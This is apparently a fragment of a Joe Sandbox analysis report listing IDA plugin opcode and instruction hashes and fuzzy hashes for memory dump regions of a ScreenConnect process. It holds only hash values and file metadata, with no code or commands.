                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 59ec0f96bb7c5a92fe9496cbe2a60e36dc1ee5525679c17c256faba0b8d406db
                                                                                                                                                                                                                                                  • Instruction ID: 9427b611bf2b6af04479949f6ac94ccc411cadf798a86a6ab46519639018ee4e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 59ec0f96bb7c5a92fe9496cbe2a60e36dc1ee5525679c17c256faba0b8d406db
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2F110035A0010A9FCF01DFA8D9409DEBBF5FF49354B108569E905BB265D771AA0ACB90
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 323825b3ace8811d647760d9efd84237f3468dc04733c7253d4ff43ac50e4c1c
                                                                                                                                                                                                                                                  • Instruction ID: c61516715bc2419435c1c5abfc261933ece0eb594eb73b29d049ec5e9035d82d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 323825b3ace8811d647760d9efd84237f3468dc04733c7253d4ff43ac50e4c1c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DC012632B112619B8B098B6DA84446BB7E9FBC42603154ABBD105CB305DBB1EC068BD0
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 2e5cd1d73fc1a802b0e8f607d3494c1d1dae71bbf1a95018c922ef5dba114860
                                                                                                                                                                                                                                                  • Instruction ID: 0b067a492eef3393b038ba1bd55ebba7fef268052317beaaff0407053acc571d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2e5cd1d73fc1a802b0e8f607d3494c1d1dae71bbf1a95018c922ef5dba114860
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 65018032E1011ADFDB09DFA9D8448CDBBF2FF89314F4984AAE405BB254DB356946CB90
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940031618.000000000160D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0160D000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_160d000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 1facc1a5ef41697ca3a8b3792f820658c9e4cbe430d07c827ae811f3f4773067
                                                                                                                                                                                                                                                  • Instruction ID: 440f4c56d67f5da7880559887101b6ca37df96cc0b4e10166ba86fbfa72c4acf
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1facc1a5ef41697ca3a8b3792f820658c9e4cbe430d07c827ae811f3f4773067
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6A01176240E3C09ED7178B658894A52BFB4AF42224F1981DBD9898F2A7C2699849C772
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940031618.000000000160D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0160D000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_160d000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 79fe3e3cc3aed09f27b17ad738b8e40b8e80025b377df7f92cb214fb4ee9adb2
                                                                                                                                                                                                                                                  • Instruction ID: 72d026a14e205a65f620b35f7d3fbce36b5a7e1b7f7e15e7847921af4ed2a4ba
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 79fe3e3cc3aed09f27b17ad738b8e40b8e80025b377df7f92cb214fb4ee9adb2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DD01F7714083009AE716CEE9CD84B67BF98EF413A4F08C629ED4E4A2D6C379D842C6B1
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: d4c461bbccb17ccee6f8625e5430ed73690ba3588e71fdb1dd8e1adb58fe1185
                                                                                                                                                                                                                                                  • Instruction ID: 7142697ca4cdc26db5573f39f959059456d950a9f3e73ec17586e546002354c4
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d4c461bbccb17ccee6f8625e5430ed73690ba3588e71fdb1dd8e1adb58fe1185
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 53018172909391CFC7529B74AC890C8BFB0EE6631170645EFD8C4CB512F6345A97CBA2
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: fa6176d1a6f07883688148d66a6109490b8cd114f23375db936e8ccb3398801d
                                                                                                                                                                                                                                                  • Instruction ID: c7904fbd2a3a6f789f2a3e567fe13ae57994b9c762b52efc901129645557bfb6
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fa6176d1a6f07883688148d66a6109490b8cd114f23375db936e8ccb3398801d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ACF0C2323052456FDF069FA8A8009EF3FB6EB89270B05406AF509D7262CA35885683A1
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2951749324.0000000005FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FE0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 4c5087174dcae72e47df7c1ca52a6e2bfbe61c79d74626c249b24c92375f2c29
                                                                                                                                                                                                                                                  • Instruction ID: b14e36b3d47b0a57ca272131a051ee8ffbee5da6180a324ec886a36365b2756a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4c5087174dcae72e47df7c1ca52a6e2bfbe61c79d74626c249b24c92375f2c29
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6EF0247294E7800FC3135FA59C548467F70EA5321030A41EBE44ACF2E3DA25AC0AC3BA
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2951749324.0000000005FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FE0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 78705dc7aef450298bafd81c106a6b533c950415a0d5306044e57de3e129fa26
                                                                                                                                                                                                                                                  • Instruction ID: 75604309eae190193a0e07111dbf8fe15e2f8d71bd25c4b1de2bc4940d6ea9c0
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 78705dc7aef450298bafd81c106a6b533c950415a0d5306044e57de3e129fa26
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C5012C30E0010A8FCB44DFA8D658A6EBBF6FF44304F504069D409DB365EA74E940CB81
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 865e1c09ff108f42ce3031ef403d724555c5d0585a5ca0e594c5cd1add70be99
                                                                                                                                                                                                                                                  • Instruction ID: 6372ad15b795152b6467530441d876059df9d33fd7c07c59e364f075fa441872
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 865e1c09ff108f42ce3031ef403d724555c5d0585a5ca0e594c5cd1add70be99
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 30F0F6763042055FD714CB7CE88484BBBEAEF892B4311CA6AE409CB395EA71EC4587A0
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: efbd01380f0458ac379d761df2a92fe40af819128e48957e936c2b25099ae67a
                                                                                                                                                                                                                                                  • Instruction ID: 4b636975f78cb2bfc2770d91b7751cd4e32540994350722513f7fbd2bac7ec7c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: efbd01380f0458ac379d761df2a92fe40af819128e48957e936c2b25099ae67a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EAF0EC22A0F3D11FC713137928648923FB8DECB1A030B01EBE888CB153E4096C1BC3A2
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 559c0dd901727af484d12ab59d987ce73e2a4ffd408217d46c59d7567994ddfe
                                                                                                                                                                                                                                                  • Instruction ID: 5091c6b7dc68752e19974164cac117bc3090d14306d7f999c231d57c493c4372
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 559c0dd901727af484d12ab59d987ce73e2a4ffd408217d46c59d7567994ddfe
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 77012C31E00159DBCB08DFA9D9048CDBBB6FF89314F0585AAE505B7254DB306946CBA0
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 1c3648e9fefae49a21bf89db3094eb42af7417de36247a46d3044c89f1ddebfc
                                                                                                                                                                                                                                                  • Instruction ID: 643dbf986db1dcf60fd716361e8dbf069c96bd0f7a772ce55b302af049abc5ca
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1c3648e9fefae49a21bf89db3094eb42af7417de36247a46d3044c89f1ddebfc
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 87F05836B092046AD728CAAEA501A9BBBEECBC4220B1484BFE54DC3640E931A4408768
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: ff05465e28b0228774d29e016ecc6670f1d0f8f6a11808941c630c00c9f627fb
                                                                                                                                                                                                                                                  • Instruction ID: 3a22d276ab645af684b79f5bbab5ac3a024c41778284db88b086fa4cf8c10164
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ff05465e28b0228774d29e016ecc6670f1d0f8f6a11808941c630c00c9f627fb
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 56F019B0D052599F8B41DFB9D84159EFFF4AF89310B1580AAE958DB215E2319A12CB80
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 4240668e6468ce7a9442a132e8b1046ed82975b52d5ed5797fe815204de5b8ca
                                                                                                                                                                                                                                                  • Instruction ID: 13fb94d992db14bdbd54ab6b7710ebff2ca681a9ba49798c6f5d8d8e6debe764
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4240668e6468ce7a9442a132e8b1046ed82975b52d5ed5797fe815204de5b8ca
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E4F0F67190A3C4AFDB12DF78AC4949D7FB0EB43200B0944DBC444C7257E6305E05CB62
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 139391f582a2fecb3209446fbdcbaa5175a7834476b104a813993f98c4831b00
                                                                                                                                                                                                                                                  • Instruction ID: b9de61c08f31bec1bf75a5dbe4c650cef34be1eea39a2f95fd2fb48d5c1e0c1d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 139391f582a2fecb3209446fbdcbaa5175a7834476b104a813993f98c4831b00
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A1F05E313002045F9B14DAADE84495FBBEAEFC92B53108A2AE419CB394DA71EC4587A0
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: c096128e655c09eb5386deb0ba20b46a6f7705cd6ddfd58215fda682064773d6
                                                                                                                                                                                                                                                  • Instruction ID: 294b84f811809da59c6056f4dd4a591d2d0881a1356402d18afaceea3dd23e63
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c096128e655c09eb5386deb0ba20b46a6f7705cd6ddfd58215fda682064773d6
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A5F05E313012159F9714EAADE844D5BBBEAEF842B4310862AE419CB394EA71ED4587A4
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 5fa8ae49ab986ef347cd0de64358b3d5f41606a89816385e8fc56a52b166b274
                                                                                                                                                                                                                                                  • Instruction ID: 4c868f3e191e4a09b1656b8ec4c7d762a27cdb162b169454051a2c230e92ac2d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5fa8ae49ab986ef347cd0de64358b3d5f41606a89816385e8fc56a52b166b274
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1AF0E271700701AB8715965EE880A6BBBEAEBC4624340856FD21AC7314DF64FC098790
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: d7cacfa67187e13a27671fc2e2f7bf22517f08d017e7d826b0af1c599fdc00f0
                                                                                                                                                                                                                                                  • Instruction ID: abf8f4b905fb437bc263fa00f99c00647e1411b60111374cff24fd2fe543dd17
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d7cacfa67187e13a27671fc2e2f7bf22517f08d017e7d826b0af1c599fdc00f0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 52F0F6225093800FD717D768F85169A7FE1EEC321074A0ADED081CB266D654E909D355
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 3dc38df4a398fa3c6e9e0d054d7371f0bc56bd32e2ac7ed1382021c6cc11fb5e
                                                                                                                                                                                                                                                  • Instruction ID: d6ed785f2023f1f2be8d16246cb46eac0b8a9ec73d6c1197353fe37a6a625554
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3dc38df4a398fa3c6e9e0d054d7371f0bc56bd32e2ac7ed1382021c6cc11fb5e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A1F0A076A0D3442FD3168BBA990159B7FEDCFC611070980AFD54CC3242E821950287A8
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: f1a2c2ce84b32cb427e7ab337a444263a2e4c62ce825476cbee8a02b56caeecb
                                                                                                                                                                                                                                                  • Instruction ID: 94187194a6b81d6a4cee964c0d276620f261dbab2ef673544c933fb570847000
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f1a2c2ce84b32cb427e7ab337a444263a2e4c62ce825476cbee8a02b56caeecb
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FFF0E5223153805BD7195ABE689C42A7FEAEBCE56571840BEE50AC7346CD299C058374
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 14d3c18890525d0d6201f7e151628ad81cf0c846d79768b0c386f2b497c82d38
                                                                                                                                                                                                                                                  • Instruction ID: 41dd05b1efdee7703ee20d449257642ccede2b7a965de518d102ded3e1bf8e7e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 14d3c18890525d0d6201f7e151628ad81cf0c846d79768b0c386f2b497c82d38
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EBF0A930A05248EFDB49EFA8D8452ACBBF0FB01210F5104EAC001A7264EB306B80CB81
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 8221086cc99b69803c57004e8a2f7b9840de8d411f33bf13d7849cc09e09e13c
                                                                                                                                                                                                                                                  • Instruction ID: c8a9e3f920c6aa9934962ebbcd56364f84ad6c02743fc7fa0eb462bbe47708d1
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8221086cc99b69803c57004e8a2f7b9840de8d411f33bf13d7849cc09e09e13c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 12F03730A01208EFDB48EBA8D5486ACBBF1FB44254F5041A9C505A7268EB306F94CB90
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 0f2b1c1a21b13e46922adb28f98f75382dca32a0ab198bad38cfdab73a763aca
                                                                                                                                                                                                                                                  • Instruction ID: 6e8914683695127cca5f391efa06276e88e64b60c549067d87fa216a2da8056a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0f2b1c1a21b13e46922adb28f98f75382dca32a0ab198bad38cfdab73a763aca
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 41F05E30B001148FD719DF6DD958AAEBBE1EF8835070580A9EC05CB368DB34DD11CB80
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 62c1c24bc2abd1dd05c311b69b771a41c2ad58145ec2446d6d5a69f81c140a46
                                                                                                                                                                                                                                                  • Instruction ID: 19a2451828b789ec4b398138a7f72691144614939451d2134da297d6577dbc4e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 62c1c24bc2abd1dd05c311b69b771a41c2ad58145ec2446d6d5a69f81c140a46
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 84E065367041096F4B09DB4ED440D5BBBEAEFD8360715C06AFC09C7355DA35DD118BA4
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 3cae1918188de4958d0da184598b3cada8768675cd40e42a9104640e6248b6ae
                                                                                                                                                                                                                                                  • Instruction ID: 62bdf3e6517b48248f193ce7cb745c183cc058bee52dd7898bc66c5372a8b777
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3cae1918188de4958d0da184598b3cada8768675cd40e42a9104640e6248b6ae
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 83F0A7326552404FC316A778AC1549F7BB2EBC121170889BFE506CB349DF628C4687E4
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 83c2506f02889d142f906f4ce08e00c9f18b8101accec568b3c4c77d17c7772b
                                                                                                                                                                                                                                                  • Instruction ID: 9f7dc21356a3ba114a86d8599d01176193d3adda1721794f61b09f7f1daa42aa
